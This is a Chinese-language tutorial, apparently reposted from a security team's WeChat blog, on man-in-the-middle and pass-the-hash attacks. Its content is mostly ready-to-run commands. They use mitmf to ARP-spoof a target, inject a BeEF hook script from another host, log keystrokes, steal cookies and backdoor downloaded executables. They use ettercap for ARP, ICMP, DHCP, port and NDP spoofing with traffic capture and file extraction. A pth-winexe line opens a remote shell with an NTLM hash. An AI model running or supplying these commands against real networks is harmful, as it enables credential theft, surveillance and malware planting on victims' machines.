密码破解——中间人攻击(mitmf、ettercap、PTH)

admin 2022年12月16日20:45:36评论68 views字数 2191阅读7分18秒阅读模式


密码破解——中间人攻击(mitmf、ettercap、PTH)


前言

本节学习中间人攻击

1、mitmf

kali没有预安装
可参考
https://blog.csdn.net/Fly_hps/article/details/80564411

结合beef

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://192.168.1.110:3000/hook.js #作为中间人连接网页并插入 jsmitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger #键盘记录器 --jskeyloggermitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --upsidedownterne #图片上下颠倒mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen #每10s快照,在var/log/mitmfmitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --ferretng #抓取cookiemitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler #浏览器与插件信息mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114  --filepwn #用户下载的可执行程序在经过代理的时候,会被插入后门,有个成功率

2、ettercap

统一的中间人攻击工具
转发 MAC 与本机相同,但 IP 与本机不同的数据包
支持 SSH1、SSL 中间人攻击

Snifer

配置文件在 /etc/ettercap/etter.conf
负责数据包转发
unified:单网卡下独立完成三层包转发
bridge:双网卡情况下的一层MITM模式,可作为IPS过滤数据包

MITM

把流量重定向到 ettercap 主机上
可以使用其他工具实现 MITM,ettercap 只作嗅探和过滤使用
实现方法

  • ARP

  • ICMP :路由重定向,半双工

  • DHCP:修改网关地址,半双工

  • Switch Port Stealing :flood目标地址是本机,源地址是受害者的包,适用于ARP静态绑定的环境

  • NDP :IPv6协议欺骗技术

操作界面

-T:文本界面图形
-G:界面
-C:基于文本的图形界面
-D:后台模式

例子

ettercap -i eth0 -T -M arp:remote -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message #arp攻击,-F是过滤器(脚本),-P是模块,-w抓包,-l日志,-L详细日志,-m消息,remote全双工ettercap -i eth0 -T -M icmp:00:11:22:33:44:55/192.168.1.110 #ICMP(真实网关的MAC/IP)ettercap -i eth0 -T -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1#DHCP (DNS)ettercap -i eth0 -T -M port /1.1.1.1/ /1.1.1.2/ #Port ettercap -i eth0 -T -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/ #Ndp 

日志查看

etterlog -p log.ecietterlog -c log.ecpetterlog -c -f /1.1.1.1/ log.ecpetterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件

脚本

/usr/share/ettercap/

etterfilter etter.filter.ssh -o ssh.ef #编译

3、Pass the Hash (PTH)

密码破解耗费时间资源巨大
使用密文提交给服务器直接完成身份认证
NTLM/LM是没有加盐的静态HASH密文
企业中使用ghost等工具克隆安装系统

pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd

结语

至此密码破解学习结束





   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):密码破解——中间人攻击(mitmf、ettercap、PTH)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月16日20:45:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   密码破解——中间人攻击(mitmf、ettercap、PTH)http://cn-sec.com/archives/1469468.html

发表评论

匿名网友 填写信息